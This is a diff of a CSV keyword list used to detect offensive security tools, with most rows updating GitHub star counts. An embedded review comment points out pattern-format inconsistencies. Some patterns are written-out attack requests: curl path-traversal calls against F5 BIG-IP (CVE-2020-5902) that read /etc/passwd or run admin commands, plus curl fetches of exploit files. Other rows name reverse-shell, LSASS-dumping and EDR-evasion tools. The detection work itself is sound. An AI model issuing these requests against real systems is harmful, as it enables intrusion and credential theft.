-"*ctfr.py*","offensive_tool_keyword","ctfr","Abusing Certificate Transparency logs for getting HTTPS websites subdomains.","T1593 - T1594 - T1595 - T1567","TA0007 - TA0009 - TA0010","N/A","N/A","Information Gathering","https://github.com/UnaPibaGeek/ctfr","1","0","N/A","N/A","10","1792","281","2022-05-03T12:59:37Z","2018-03-06T01:14:28Z"
+"*CT_Indirect_Syscalls.c*","offensive_tool_keyword","Indirect-Syscalls","Indirect syscalls serve as an evolution of direct syscalls and enable enhanced EDR evasion by legitimizing syscall command execution and return statement within the ntdll.dll memory. This stealthy operation partially implements the syscall stub in the Indirect Syscall assembly itself.","T1055 - T1548.002 - T1129","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/VirtualAlllocEx/Direct-Syscalls-vs-Indirect-Syscalls","1","1","N/A","N/A","1","68","10","2023-05-24T04:23:37Z","2023-05-23T06:30:54Z"
+"*CT_Indirect_Syscalls.exe*","offensive_tool_keyword","Indirect-Syscalls","Indirect syscalls serve as an evolution of direct syscalls and enable enhanced EDR evasion by legitimizing syscall command execution and return statement within the ntdll.dll memory. This stealthy operation partially implements the syscall stub in the Indirect Syscall assembly itself.","T1055 - T1548.002 - T1129","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/VirtualAlllocEx/Direct-Syscalls-vs-Indirect-Syscalls","1","1","N/A","N/A","1","68","10","2023-05-24T04:23:37Z","2023-05-23T06:30:54Z"
+"*CT_Indirect_Syscalls.sln*","offensive_tool_keyword","Indirect-Syscalls","Indirect syscalls serve as an evolution of direct syscalls and enable enhanced EDR evasion by legitimizing syscall command execution and return statement within the ntdll.dll memory. This stealthy operation partially implements the syscall stub in the Indirect Syscall assembly itself.","T1055 - T1548.002 - T1129","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/VirtualAlllocEx/Direct-Syscalls-vs-Indirect-Syscalls","1","1","N/A","N/A","1","68","10","2023-05-24T04:23:37Z","2023-05-23T06:30:54Z"
+"*CT_Indirect_Syscalls.vcxproj*","offensive_tool_keyword","Indirect-Syscalls","Indirect syscalls serve as an evolution of direct syscalls and enable enhanced EDR evasion by legitimizing syscall command execution and return statement within the ntdll.dll memory. This stealthy operation partially implements the syscall stub in the Indirect Syscall assembly itself.","T1055 - T1548.002 - T1129","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/VirtualAlllocEx/Direct-Syscalls-vs-Indirect-Syscalls","1","1","N/A","N/A","1","68","10","2023-05-24T04:23:37Z","2023-05-23T06:30:54Z"
+"*ctfr.py*","offensive_tool_keyword","ctfr","Abusing Certificate Transparency logs for getting HTTPS websites subdomains.","T1593 - T1594 - T1595 - T1567","TA0007 - TA0009 - TA0010","N/A","N/A","Information Gathering","https://github.com/UnaPibaGeek/ctfr","1","0","N/A","N/A","10","1793","281","2022-05-03T12:59:37Z","2018-03-06T01:14:28Z"
 "*ctftool*","offensive_tool_keyword","ctftool","This is ctftool. an interactive command line tool to experiment with CTF. a little-known protocol used on Windows to implement Text Services. This might be useful for studying Windows internals. debugging complex issues with Text Input Processors and analyzing Windows security.","T1547.001 - T1059 - T1057","TA0001 - TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/taviso/ctftool","1","0","N/A","N/A","10","1626","278","2021-09-17T21:02:25Z","2019-06-07T03:39:10Z"
 "*cube0x0/LdapSignCheck*","offensive_tool_keyword","cobaltstrike","Beacon Object File & C# project to check LDAP signing","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/cube0x0/LdapSignCheck","1","1","N/A","10","10","148","22","2022-10-25T13:36:43Z","2022-02-24T20:25:31Z"
 "*cube0x0/MiniDump*","offensive_tool_keyword","onex","C# implementation of mimikatz/pypykatz minidump functionality to get credentials from LSASS dumps","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - 
T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/cube0x0/MiniDump","1","1","N/A","N/A","3","263","48","2021-10-13T18:00:46Z","2021-08-14T12:26:16Z" 
@@ -8979,11 +9127,11 @@ "*curl -sk 'https://*/tmui/login.jsp/.. /tmui/util/getTabSet.jsp?tabId=Vulnerable*","offensive_tool_keyword","POC","exploit code for F5-Big-IP (CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation tools","https://gist.github.com/cihanmehmet/07d2f9dac55f278839b054b8eb7d4cc5","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*curl -v -k 'https://*/tmui/login.jsp/.. /tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd*","offensive_tool_keyword","POC","exploit code for F5-Big-IP (CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation tools","https://github.com/jas502n/CVE-2020-5902","1","0","N/A","N/A","4","377","112","2021-10-13T07:53:46Z","2020-07-05T16:38:32Z" "*curl -v -k 'https://*/tmui/login.jsp/.. /tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin*","offensive_tool_keyword","POC","exploit code for F5-Big-IP (CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation tools","https://github.com/jas502n/CVE-2020-5902","1","0","N/A","N/A","4","377","112","2021-10-13T07:53:46Z","2020-07-05T16:38:32Z" -"*curl*.interact.sh*","offensive_tool_keyword","interactsh","Interactsh is an open-source tool for detecting out-of-band interactions. It is a tool designed to detect vulnerabilities that cause external interactions but abused by attackers as C3","T1566.002 - T1566.001 - T1071 - T1102","TA0011 - TA0001","N/A","N/A","C2","https://github.com/projectdiscovery/interactsh","1","1","FP risk - legitimate service abused by attackers - move to admintools ?","10","10","2675","317","2023-10-02T08:20:04Z","2021-01-29T14:31:51Z" +"*curl*.interact.sh*","offensive_tool_keyword","interactsh","Interactsh is an open-source tool for detecting out-of-band interactions. 
It is a tool designed to detect vulnerabilities that cause external interactions but abused by attackers as C3","T1566.002 - T1566.001 - T1071 - T1102","TA0011 - TA0001","N/A","N/A","C2","https://github.com/projectdiscovery/interactsh","1","1","FP risk - legitimate service abused by attackers - move to admintools ?","10","10","2677","317","2023-10-02T08:20:04Z","2021-01-29T14:31:51Z" "*curl*/tmp/exploit-dirty-pipe*","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","t1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/carlosevieira/Dirty-Pipe","1","1","N/A","N/A","1","8","5","2022-03-07T21:01:15Z","2022-03-07T20:57:34Z" -"*curlshell.py*","offensive_tool_keyword","curlshell","reverse shell using curl","T1105 - T1059.004 - T1140","TA0011 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/irsl/curlshell","1","1","N/A","10","10","269","28","2023-09-29T08:31:47Z","2023-07-13T19:38:34Z" -"*cursed chrome","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6596","920","2023-10-03T20:36:09Z","2019-01-17T22:07:38Z" -"*cursed cookies","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6596","920","2023-10-03T20:36:09Z","2019-01-17T22:07:38Z" +"*curlshell.py*","offensive_tool_keyword","curlshell","reverse shell using curl","T1105 - T1059.004 - 
T1140","TA0011 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/irsl/curlshell","1","1","N/A","10","10","272","29","2023-09-29T08:31:47Z","2023-07-13T19:38:34Z" +"*cursed chrome","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*cursed cookies","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" "*custom_payload_generator.*","offensive_tool_keyword","cobaltstrike","Various Aggressor Scripts I've Created.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt 
Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/offsecginger/AggressorScripts","1","1","N/A","10","10","141","31","2022-01-01T19:04:27Z","2018-11-30T03:14:45Z" "*CustomKeyboardLayoutPersistence*","offensive_tool_keyword","cobaltstrike","Achieve execution using a custom keyboard layout","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/NtQuerySystemInformation/CustomKeyboardLayoutPersistence","1","1","N/A","10","10","156","30","2023-05-23T20:34:26Z","2022-03-13T17:43:29Z" "*CVE-*.bash*","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1543 - T1588 - T1211 - T1203","TA0008 - TA0009 - TA0010","N/A","N/A","Exploitation tools","https://github.com/gottburgm/Exploits","1","1","N/A","N/A","2","184","113","2020-04-17T07:28:55Z","2017-10-13T10:19:55Z" 
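Review bot: The two re-added sliver rows still use the keywords `"*cursed chrome"` and `"*cursed cookies"` with no trailing `*`, unlike every other keyword in this hunk, so depending on how the consumer anchors patterns they may match only when nothing follows the command; `"*cursed chrome*"` and `"*cursed cookies*"` would be consistent with the rest. The same rows write sub-techniques as `T1573-001`, `T1059-001` and so on, where the other rows use the dotted form (`T1059.004`), so a join against ATT&CK ids would presumably miss them. The interactsh row's description also says "abused by attackers as C3", which looks like a typo for C2 given its category column. Only the star, fork and updated_at columns change in this hunk, so all three are carried over unchanged.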
@@ -9009,16 +9157,16 @@ "*CVE*/exploit.sh*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z" "*CVE_*_exploited.txt*","offensive_tool_keyword","POC","A Safer PoC for CVE-2022-22965 (Spring4Shell)","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Exploitation tools","https://github.com/colincowie/Safer_PoC_CVE-2022-22965","1","1","N/A","N/A","1","45","7","2022-05-27T12:56:40Z","2022-03-31T16:58:56Z" "*cve_2_MSF_exploit_Mapping*","offensive_tool_keyword","Xerror","fully automated pentesting tool","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/Chudry/Xerror","1","1","N/A","N/A","5","458","106","2022-12-08T04:33:03Z","2019-08-16T21:20:52Z" -"*CVE_20*.dll*","offensive_tool_keyword","cobaltstrike","A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. 
etc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/yanghaoi/CobaltStrike_CNA","1","1","N/A","10","10","402","78","2022-01-18T12:47:55Z","2021-04-21T13:10:11Z" -"*cve_2019_0708_bluekeep_fail*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*cve_2019_0708_bluekeep_pass*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*cve_2020_0796_smbghost.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. 
and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*cve-20.x64.dll*","offensive_tool_keyword","cobaltstrike","The Elevate Kit demonstrates how to use third-party privilege escalation attacks with Cobalt Strike's Beacon payload.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/ElevateKit","1","1","N/A","10","10","812","205","2020-06-22T21:12:24Z","2016-12-08T03:51:09Z" -"*cve-20.x86.dll*","offensive_tool_keyword","cobaltstrike","The Elevate Kit 
demonstrates how to use third-party privilege escalation attacks with Cobalt Strike's Beacon payload.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/ElevateKit","1","1","N/A","10","10","812","205","2020-06-22T21:12:24Z","2016-12-08T03:51:09Z" +"*CVE_20*.dll*","offensive_tool_keyword","cobaltstrike","A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. 
etc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/yanghaoi/CobaltStrike_CNA","1","1","N/A","10","10","403","78","2022-01-18T12:47:55Z","2021-04-21T13:10:11Z" +"*cve_2019_0708_bluekeep_fail*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*cve_2019_0708_bluekeep_pass*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*cve_2020_0796_smbghost.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. 
and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*cve-20.x64.dll*","offensive_tool_keyword","cobaltstrike","The Elevate Kit demonstrates how to use third-party privilege escalation attacks with Cobalt Strike's Beacon payload.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/ElevateKit","1","1","N/A","10","10","813","205","2020-06-22T21:12:24Z","2016-12-08T03:51:09Z" +"*cve-20.x86.dll*","offensive_tool_keyword","cobaltstrike","The Elevate Kit 
demonstrates how to use third-party privilege escalation attacks with Cobalt Strike's Beacon payload.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/ElevateKit","1","1","N/A","10","10","813","205","2020-06-22T21:12:24Z","2016-12-08T03:51:09Z" "*CVE-2020-5902-Scanner/scanner.py*","offensive_tool_keyword","POC","exploit code for F5-Big-IP (CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation tools","https://github.com/aqhmal/CVE-2020-5902-Scanner","1","0","N/A","N/A","1","54","22","2022-12-08T11:03:15Z","2020-07-05T06:19:09Z" "*CVE-2021-34527.ps1*","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. 
